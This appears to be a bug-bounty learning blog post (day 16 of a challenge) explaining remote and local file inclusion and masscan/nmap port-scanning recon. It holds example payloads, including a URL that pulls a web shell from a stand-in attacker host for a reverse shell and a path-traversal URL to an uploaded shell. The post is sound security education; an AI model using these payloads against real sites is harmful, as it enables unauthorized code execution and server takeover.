Day 16/100 Hack and Improvement

2 minute read

After two weeks of constant learning and hacking, we finally have gotten some results! Rajesh Ranjan with a great P2 level vulnerability in Bugcrowd, and Sam (CoffeeJunkie) with his first valid vulnerability report in intigriti.

Here it is the P2 level vulnerabilty that have gotten triaged by Rajesh Ranjan nmap scan

And the first valid vulnerability report from Sam (CoffeeJunkie) nmap scan

Day 16 comes with more learning about the following vulnerabilities.

File Inclusion Vulnerabilities

From Rajesh Ranjan. A file inclusion vulnerability allows an attacker to access unauthorized or sensitive files available on the web server or to execute malicious files on the web server by making use of the ‘include’ functionality. This vulnerability is mainly due to a bad input validation mechanism, wherein the user’s input is passed to the file include commands without proper validation. This vulnerability can cause code execution attacks, or even read internal sensitive files present on the server. There are Basically two types of file inclusion vulnerability.

  1. Remote File Inclusion (RFI)
  2. Local File Inclusion (LFI)

Remote File Inclusion

Remote file inclusion occurs when web application includes a remote file or any script located on another server. For example, there is a website named example.com, including its index.php using a file parameter as follows

https://example.com/file=index.php

Now in this case, an attacker may be able to exploit this functionality, and can place an evil code named evil.php on his own server that contains a web shell, and might be able to exploit as:

http://example.com/?file=http://attacker.example.com/evil.php

Now as soon as this code executes, attack might be able to gain a reverse shell on his side, and has full access of the web server.

Local File Inclusion

Local file inclusion occurs when an attacker may be able to trick application to expose the file of the web server. A successful LFI attack may lead to XSS, code execution attacks. Basically LFI occurs when application uses path to a file as input. LFI is much similar to RFI, but in LFI an attacker may only include local file (not remote files as RFI).

Case 1: Suppose, there is an upload section on the server, and an attacker has successfully uploaded a web shell to the server, then can trick the web sever to include that web shell file named evil.php as follows

http://example.com/?file=../../uploads/evil.php

So by this way, he/she can get the code execution on the server.

Case 2: The another attack which we can perform using LIF is Directory traversal attack. Check this out here.

Cheatsheets and Payloads

  1. https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal

Port Scanning For Recon

From Sam (CoffeeJunkie). Port scanning for network and web application pentesting can open a new eye full of possibilites. Two of the most known port scanners are masscan and the classic nmap. There is a big difference between nmap and masscan, usually nmap takes longer than masscan due to its programming language, and network scanning methods. Masscan is faster because has been programmed in C and it can scan the whole internet with enough hardware in 15 minutes.

Scanning methods

One of the methods in order to obtain fast and decent results is first using masscan due to its speed.

masscan -iL resolved-ips.txt -p1-65535 -oL output.txt

Once the scan is done and you see interesting ports such as 4080,21, and such you can use nmap to get detailed information from one IP.

nmap -Pn -T4 -A 10.10.10.10 -p21,4080 -oN output.nmap

Advantages

Some cases depending on the target, they might be running different kind of vulnerable software that might lead to further exploitation. It is strongly recommend to use nmap scripts. Here you can find more information related to the scripts.

Leave a comment